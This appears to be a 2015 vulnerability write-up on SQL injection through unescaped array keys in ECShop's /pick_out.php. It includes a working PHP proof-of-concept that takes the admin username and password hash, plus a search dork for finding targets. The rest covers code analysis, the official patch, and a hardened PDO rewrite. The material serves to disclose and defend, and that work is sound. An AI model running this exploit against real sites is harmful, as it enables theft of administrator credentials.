Catalog
1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Mitigation
6. Offense and defense thoughts
1. Vulnerability description
When input variables are registered locally by emulating GPC, no effective GPC-style escaping or filtering is applied, which leads to SQL injection through the array key.
Relevant Link:
http://bbs.ecshop.com/thread-150545-1-1.html
2. Trigger conditions
1. The /pick_out.php vulnerability has not been patched
2. magic_quotes_gpc = Off
0x1: POC
#!/usr/bin/php
<?php
// This program is for technical exchange only; do not use it for illegal purposes!!
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
dork: "owered by ECShop"
+---------------------------------------------------------------------------+
');

/**
 * works with magic_quotes_gpc = Off
 */

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:    target server (ip/hostname)
path:    path to ecshop
Example: php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
// The injected CONCAT(user_name, 0x3a, password) shows up inside the failing "goods_id IN (...)" query
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);

if ($hash)
    exit("Exploit Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path;
    $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';
    $data  = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}
?>
3. Affected scope
4. Vulnerable code analysis
/pick_out.php
..
/* Handle attributes: fetch the goods_id values that satisfy the attributes */
if (!empty($_GET['attr']))
{
    $attr_table   = '';
    $attr_where   = '';
    $attr_url     = '';
    $i            = 0;
    $goods_result = '';

    foreach ($_GET['attr'] AS $key => $value)
    {
        $attr_url .= '&attr[' . $key . ']=' . $value;
        $attr_picks[] = $key;
        if ($i > 0)
        {
            if (empty($goods_result))
            {
                break;
            }
            // injection via the key: $key is concatenated into the SQL unescaped
            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");
        }
        else
        {
            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE attr_id='$key' AND attr_value='$value'");
        }
        $i++;
    }
..
5. Mitigation
/pick_out.php
define('IN_ECS', true);
require(dirname(__FILE__) . '/includes/init.php');

$condition = array();
$picks     = array();
$cat_id    = !empty($_GET['cat_id']) ? intval($_GET['cat_id']) : 0;

/* */
if (!empty($_GET['attr']))
{
    // Normalize the keys and values of the input array
    foreach($_GET['attr'] as $key => $value)
    {
        if (!is_numeric($key))
        {
            unset($_GET['attr'][$key]);
            continue;
        }
        $key = intval($key);
        $_GET['attr'][$key] = htmlspecialchars($value);
    }
}
/* */
Relevant Link:
http://bbs.ecshop.com/thread-86922-1-1.html
6. Offense and defense thoughts
GPC auto-registration is a native mechanism provided by PHP. Many CMSs, in order to work "regardless of the user's own settings", emulate this automatic GPC registration in their global entry code, similar to:
/*
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = $_v;
}
*/
However, when emulating this local registration of GPC variables, security must be kept consistent: the "magic_quotes_gpc = On" mechanism has to be emulated at the same time, i.e. both the key and the value of the incoming data need to be escaped and filtered, for example:
function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if( is_array($svar) )
        {
            // recurse into array values; note that the keys ($_k) are passed through unescaped
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
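As an added example (not ECShop's code and not the snippet from the forum thread), the following rewrites the pick_out.php attribute loop from section 4 so that neither the array key nor the value ever reaches the SQL string: keys are whitelisted as digit strings, since the PoC carries its payload in the key and the value-only escaping of _RunMagicQuotes above would not catch it, and values are bound as PDO parameters. It assumes a connected PDO handle $pdo and ECShop's default table name ecs_goods_attr.

```php
<?php
// Added example, not ECShop's own code. Hardened version of the pick_out.php
// attribute loop: keys are validated, values are bound as parameters.
// Assumed: $pdo is a connected PDO handle; the table is ecs_goods_attr
// (ECShop's default prefix), used here for illustration.

function normalize_attr_filter(array $attr): array
{
    $clean = [];
    foreach ($attr as $key => $value) {
        // The PoC puts SQL into the array key; only digit-only keys survive.
        // (Escaping values alone, as _RunMagicQuotes does, would not stop this.)
        if (!ctype_digit((string) $key)) {
            continue;
        }
        $clean[(int) $key] = (string) $value;
    }
    return $clean;
}

function pick_goods_ids(PDO $pdo, array $attr): array
{
    $goodsIds = null;   // null = no attribute applied yet
    foreach (normalize_attr_filter($attr) as $attrId => $attrValue) {
        $sql    = 'SELECT goods_id FROM ecs_goods_attr WHERE attr_id = ? AND attr_value = ?';
        $params = [$attrId, $attrValue];
        if ($goodsIds !== null) {
            if ($goodsIds === []) {
                return [];  // intersection already empty, like the original break
            }
            // One placeholder per previously matched goods_id; all are ints.
            $in     = implode(',', array_fill(0, count($goodsIds), '?'));
            $sql   .= " AND goods_id IN ($in)";
            $params = array_merge($params, $goodsIds);
        }
        $stmt = $pdo->prepare($sql);
        $stmt->execute($params);
        $goodsIds = array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
    }
    return $goodsIds ?? [];
}

// Constructed input mirroring the PoC: payload in the key, benign value.
$attr = [
    "' UNION SELECT CONCAT(user_name,0x3a,password) AS goods_id FROM ecs_admin_user#" => 'ryat',
    '12' => 'red',
];
var_dump(normalize_attr_filter($attr));   // only [12 => 'red'] remains
```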
Copyright (c) 2015 LittleHann All rights reserved
ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding